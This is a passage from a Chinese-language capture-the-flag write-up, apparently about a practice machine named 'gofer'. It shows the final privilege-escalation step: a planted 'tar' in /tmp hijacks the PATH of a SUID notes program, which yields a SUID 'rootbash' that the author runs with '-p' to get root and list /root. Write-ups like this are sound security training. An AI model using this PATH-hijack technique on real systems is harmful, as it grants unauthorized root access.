-rwxr-xr-x  1 tbuckley tbuckley   52 Aug  5 15:49 tar
drwxrwxrwt  2 root     root     4096 Aug  5 08:05 .Test-unix
drwx------  2 root     root     4096 Aug  5 08:05 vmware-root_617-4022243191
drwxrwxrwt  2 root     root     4096 Aug  5 08:05 .X11-unix
drwxrwxrwt  2 root     root     4096 Aug  5 08:05 .XIM-unix

再设置一下PATH,在重新执行一下notes

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
========================================
1) Create an user and choose an username
2) Show user information
3) Delete an user
4) Write a note
5) Show a note
6) Save a note (not yet implemented)
7) Delete a note
8) Backup notes
9) Quit
========================================


Your choice: 8

Access granted!

查看一下tmp目录。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
tbuckley@gofer:/tmp$ ls -la
total 1268
drwxrwxrwt 14 root     root        4096 Aug  5 15:51 .
drwxr-xr-x 18 root     root        4096 Jul 19 12:44 ..
drwxrwxrwt  2 root     root        4096 Aug  5 08:05 .font-unix
drwxr-xr-x  2 jhudson  jhudson     4096 Aug  5 14:36 hsperfdata_jhudson
drwxrwxrwt  2 root     root        4096 Aug  5 08:05 .ICE-unix
drwx------  3 jhudson  jhudson     4096 Aug  5 11:02 lu5012xuigb9.tmp
drwx------  2 jhudson  jhudson     4096 Aug  5 14:36 lu9624y25uma.tmp
srwxr-xr-x  1 jhudson  jhudson        0 Aug  5 14:36 OSL_PIPE_1000_SingleOfficeIPC_b31bb423faa33322afe433cf9acd1272
-rwsr-sr-x  1 root     root     1234376 Aug  5 15:51 rootbash
drwx------  3 root     root        4096 Aug  5 08:05 systemd-private-711ebd4724b24c22b4a90210e66cc476-apache2.service-1K3kih
drwx------  3 root     root        4096 Aug  5 08:05 systemd-private-711ebd4724b24c22b4a90210e66cc476-systemd-logind.service-FsKf3f
drwx------  3 root     root        4096 Aug  5 08:05 systemd-private-711ebd4724b24c22b4a90210e66cc476-systemd-timesyncd.service-0MAATi
-rwxr-xr-x  1 tbuckley tbuckley      52 Aug  5 15:49 tar
drwxrwxrwt  2 root     root        4096 Aug  5 08:05 .Test-unix
drwx------  2 root     root        4096 Aug  5 08:05 vmware-root_617-4022243191
drwxrwxrwt  2 root     root        4096 Aug  5 08:05 .X11-unix
drwxrwxrwt  2 root     root        4096 Aug  5 08:05 .XIM-unix
tbuckley@gofer:/tmp$ ./rootbash -p
rootbash-5.1# id
uid=1002(tbuckley) gid=1002(tbuckley) euid=0(root) egid=0(root) groups=0(root),1002(tbuckley),1004(dev)
rootbash-5.1# whoami
root
rootbash-5.1# cd /root
rootbash-5.1# ls -la
total 80
drwx------ 14 root root 4096 Jul 17 16:55 .
drwxr-xr-x 18 root root 4096 Jul 19 12:44 ..
drwxr-xr-x  2 root root 4096 Apr 28 12:19 backups
lrwxrwxrwx  1 root root    9 Nov  3  2022 .bash_history -> /dev/null
-rw-r--r--  1 root root  571 Apr 10  2021 .bashrc
drwx------  3 root root 4096 Apr 26 23:59 .config
drwxr-xr-x  2 root root 4096 Apr 26 23:59 Desktop
drwxr-xr-x  2 root root 4096 Apr 26 23:59 Documents
drwxr-xr-x  2 root root 4096 Apr 26 23:59 Downloads
drwxr-xr-x  3 root root 4096 Oct 28  2022 .local
drwxr-xr-x  2 root root 4096 Apr 26 23:59 Music
drwxr-xr-x  2 root root 4096 Apr 26 23:59 Pictures
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
drwxr-xr-x  2 root root 4096 Apr 26 23:59 Public
-rw-r-----  1 root root   33 Aug  5 08:05 root.txt
drwxr-xr-x  2 root root 4096 Jul 27 11:57 scripts
drwxr-xr-x  2 root root 4096 Apr 26 23:59 Templates
drwxr-xr-x  2 root root 4096 Apr 26 23:59 Videos
-rw-r--r--  1 root root   39 Jul 17 16:55 .vimrc
-rw-------  1 root root   54 Apr 26 23:59 .Xauthority
-rw-------  1 root root 1626 Apr 27 00:16 .xsession-errors

搞定。